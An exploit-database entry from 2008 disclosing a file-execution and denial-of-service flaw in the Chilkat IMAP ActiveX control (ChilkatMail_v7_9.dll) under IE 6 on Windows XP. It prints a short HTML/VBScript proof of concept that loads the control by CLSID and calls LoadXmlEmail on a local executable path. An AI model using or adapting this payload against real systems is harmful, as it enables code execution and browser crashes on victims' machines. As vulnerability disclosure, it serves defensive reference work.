header-logo
Suggest Exploit
vendor:
Chilkat IMAP ActiveX
by:
e.wiZz!
7.5
CVSS
HIGH
File Execution & Denial of Service
N/A
CWE
Product Name: Chilkat IMAP ActiveX
Affected Version From: ChilkatMail_v7_9.dll
Affected Version To: ChilkatMail_v7_9.dll
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: IE 6,Win xp sp2
2008

Chilkat IMAP ActiveX File Execution&IE DoS

Function 'LoadXmlEmail()' in ChilkatMail_v7_9.dll allows us to execute file which leads to DoS in IE. Tested on IE 6,Win xp sp2.

Mitigation:

Update to the latest version of ChilkatMail_v7_9.dll
Source

Exploit-DB raw data:

##################Chilkat IMAP ActiveX File Execution&IE DoS ################

www.chilkasoft.com

####By:  e.wiZz!
####Info: Bosnian Idiot FTW!
####Site: infected.blogger.ba
####Greetz: suN8Hclf,Luigi and peoples from hakin9 forum

In the wild...

#####################################################################################

File: ChilkatMail_v7_9.dll
ProgID: ChilkatMail2.ChilkatMailMan2.1
CLSID: 126FB030-1E9E-4517-A254-430616582C50

Description:

Function "LoadXmlEmail()" allows us to execute file which leads to DoS in IE.

Tested on IE 6,Win xp sp2

#####################################################################################

<object classid='clsid:126FB030-1E9E-4517-A254-430616582C50' id='inthewild' />
<script language='vbscript'>

targetFile = "C:\Program Files\Chilkat Software Inc\Chilkat IMAP ActiveX\ChilkatMail_v7_9.dll"
prototype  = "Function LoadXmlEmail ( ByVal emailFilename As String ) As IChilkatEmail2"
memberName = "LoadXmlEmail"
progid     = "CHILKATMAILLib2.ChilkatMailMan2"
argCount   = 1

arg1="C:\Program Files\mIRC\mirc.exe"

inthewild.LoadXmlEmail arg1 

</script>

# milw0rm.com [2008-09-27]